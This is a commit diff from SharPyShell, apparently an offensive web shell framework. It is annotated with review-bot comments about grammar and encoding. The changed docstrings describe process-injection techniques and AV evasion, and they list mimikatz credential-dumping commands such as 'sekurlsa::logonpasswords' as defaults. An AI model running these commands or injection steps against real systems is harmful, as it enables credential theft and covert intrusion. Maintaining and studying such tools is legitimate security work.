Projects STRLCPY SharPyShell Commits 96f26bfc
    core/config.py
    1 1  import sys
    2 2  import os
    3 3   
    4  -sharpyshell_version='1.1.10'
     4 +sharpyshell_version='1.1.11'
    5 5   
    6 6  header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
    7 7  banner = """
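Review bot: the bump from '1.1.10' to '1.1.11' on line 4 is the only change in this file, and nothing in the commit records what the release contains; add a CHANGELOG or release-notes entry (the new 'dll' exec_type in modules/mimikatz.py and the docstring fixes in the injection modules) so the version string stays meaningful for users checking which features a given build has.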
    skipped 18 lines
    modules/inject_dll_reflective.py
    skipped 20 lines
    21 21   The dll_path is a relative path to a dll that exists in the folder 'reflective_dll/'.
    22 22   The dll must be compiled with the 'ReflectiveLoader' exported function otherwise it cannot be executed
    23 23   at runtime.
    24  - You can use one of the following supported injection technique:
     24 + You can use one of the following supported injection techniques:
    25 25   - remote_virtual: classic injection:
    26 26   VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
    27 27   - remote_virtual_protect: with this technique you never allocate RWX memory (polymorphic encoders won't work):
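Review bot: while fixing 'technique' to 'techniques' on line 24, also add the missing comma on line 22 ('exported function, otherwise it cannot be executed at runtime'), which this edit leaves as a run-on in the same docstring.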
    skipped 17 lines
    45 45   
    46 46   Examples:
    47 47   Inject a messagebox reflective DLL into an existing process:
    48  - #inject_dll_reflective messagebox_reflective_x64.dll 'remote_virtual' '2264'
     48 + #inject_dll_reflective messagebox_reflective.dll remote_virtual 2264
    49 49  
    50 50   """
    51 51   
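Review bot: the example on line 48 now names `messagebox_reflective.dll` (previously `messagebox_reflective_x64.dll`) and drops the quotes around `remote_virtual` and `2264`; confirm that a file with the new name actually ships in `reflective_dll/` (line 21 says the path is resolved relative to that folder) and that the module's argument handling accepts the unquoted form, otherwise the documented example fails as written. If the DLL is still architecture-specific, keep the architecture in the file name so the example tells the user which host process it fits.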
    skipped 26 lines
    modules/inject_dll_srdi.py
    skipped 228 lines
    229 229  
    230 230  
    231 231   Inject a generic DLL into a remote process.
    232  - This module convert a generic DLL into a position independent Shellcode ready to be injected.
     232 + This module converts a generic DLL into a position independent Shellcode ready to be injected.
    233 233   You can choose to create a new process or use a pid of an existing process as a host process.
    234 234   The dll_path is a relative path to a dll that exists in the folder 'dll/'.
    235  - You can use one of the following supported injection technique:
     235 + You can use one of the following supported injection techniques:
    236 236   - remote_virtual: classic injection:
    237 237   VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
    238 238   - remote_virtual_protect: with this technique you never allocate RWX memory (polymorphic encoders won't work):
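Review bot: 'position independent Shellcode' on line 232 should read 'position-independent shellcode' (hyphenated compound, lowercase), matching the lowercase wording used on the new line 31 of modules/mimikatz.py in this same change.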
    skipped 16 lines
    255 255   Default: 'cmd.exe'
    256 256   
    257 257   Examples:
    258  - ?????????????????????????????????????????????????????????????????????????????????????????????????????
    259  - ?????????????????????????????????????????????????????????????????????????????????????????????????????
     258 + Convert a messagebox generic DLL in shellcode and inject into an existing process:
     259 + #inject_dll_srdi messagebox_msf.dll remote_virtual 2264
    260 260   """
    261 261   
    262 262   __default_exported_function_name = 0x10
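Review bot: the removed lines 258-259 render as runs of '?' in the diff, which means the previous docstring contained bytes that did not decode as text (most likely a non-UTF-8 save); the replacement text is fine, but check the file's encoding and add a coding declaration or an .editorconfig rule so the same corruption does not recur in other module docstrings. Also confirm that `messagebox_msf.dll` exists in `dll/` (line 234 says the path is resolved relative to that folder) so the new example runs as documented.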
    skipped 20 lines
    283 283   with open(dll_path, 'rb') as file_handle:
    284 284   dll_bin_byte_arr = bytearray(file_handle.read())
    285 285   srdi_object = sRDI()
    286  - # user_data = '"log C:\\windows\\temp\\powerkatz_srdi.log" privilege::debug sekurlsa::logonpasswords exit\x00'.encode('utf-16-le')
    287 286   if exported_function_name != 0x10:
    288 287   exported_function_name = srdi_object.HashFunctionName(exported_function_name)
    289 288   shellcode_bin_byte_arr = \
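Review bot: removing the commented-out `user_data` line (old line 286) is right, since dead code carrying hard-coded paths and commands should not sit in the source. While here, the check on line 286 `if exported_function_name != 0x10:` compares against a bare magic number that duplicates `__default_exported_function_name = 0x10` (line 262); compare against the named constant instead so the sentinel has a single definition.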
    skipped 14 lines
    modules/inject_shellcode.py
    skipped 12 lines
    13 13   This module allow to inject your shellcode in a host process.
    14 14   You can choose to create a new process or use a pid of an existing process as a host process.
    15 15   If you create the payload for the shellcode from msfvenom ensure you use the flag --format raw.
    16  - You can use one of the following supported injection technique:
     16 + You can use one of the following supported injection techniques:
    17 17  
    18 18   - remote_virtual: classic injection:
    19 19   VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
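Review bot: line 13 still reads 'This module allow to inject your shellcode' and is untouched by this hunk; since the hunk is fixing docstring grammar ('technique' to 'techniques' on line 16), correct it to 'This module allows you to inject your shellcode' in the same pass.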
    skipped 282 lines
    modules/mimikatz.py
    skipped 24 lines
    25 25  
    26 26  
    27 27   This module allows you to run mimikatz in a versatile way.
    28  - Within this module it is possible to run mimikatz in 2 different way:
     28 + Within this module it is possible to run mimikatz in 3 different ways:
    29 29   'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
    30  - 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments.
     30 + 'exe': the classic mimikatz binary will be uploaded to the server and run with arguments;
     31 + 'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process.
    31 32   It is recommended to run the ps1 version because it will be obfuscated and run from memory.
    32 33   The exe version will be just dropped as clear and could be catched by av scanners.
     34 + The dll version is the most stealthy but it doesn't support impersonation atm.
    33 35  
    34 36  
    35 37   Usage:
    36 38   #mimikatz [exec_type] [username] [password] [domain] [custom_command]
    37 39  
    38 40   Positional arguments:
    39  - exec_type type of running mimikatz.
    40  - 'ps1' will upload and execute the powershell version of mimikatz
    41  - 'exe' will upload and execute the classic version of binary mimikatz
     41 + exec_type execution type for running mimikatz:
     42 + 'ps1' will upload and execute the powershell version of mimikatz
     43 + 'exe' will upload and execute the classic version of binary mimikatz
     44 + 'dll' will inject converted dll shellcode into a remote process
    42 45   Default: 'ps1'
    43 46   username username of the user to runas the process
    44 47   password password of the user to runas the process
    skipped 1 lines
    46 49   custom_command based on exec_type, the custom command could be:
    47 50   - 'ps1' : powershell code to add to the ps1 mimikatz module;
    48 51   - 'exe' : command line arguments to the mimikatz binary;
     52 + - 'dll' : command line arguments to be executed.
    49 53   Default:
    50 54   'ps1': ';Invoke-Mimikatz -DumpCreds'
    51 55   'exe': 'privilege::debug sekurlsa::logonpasswords exit'
     56 + 'dll': 'privilege::debug sekurlsa::logonpasswords exit'
    52 57  
    53 58   Examples:
    54 59   Run mimikatz as the current user
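Review bot: the new 'dll' documentation leaves the docstring inconsistent with itself: line 52 describes the 'dll' custom_command as 'command line arguments to be executed' while line 56 gives it exactly the same default as 'exe', so word it like line 51 ('command line arguments to the mimikatz dll'). The impersonation limitation stated on line 34 should also be reflected in the username/password descriptions (lines 46-47), which currently imply runas works for every exec_type. Finally, tidy the wording this hunk touches: 'could be catched' (line 33) to 'could be caught', 'the most stealthy' (line 34) to 'the stealthiest', and spell out 'atm' as 'at the moment'.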
    skipped 105 lines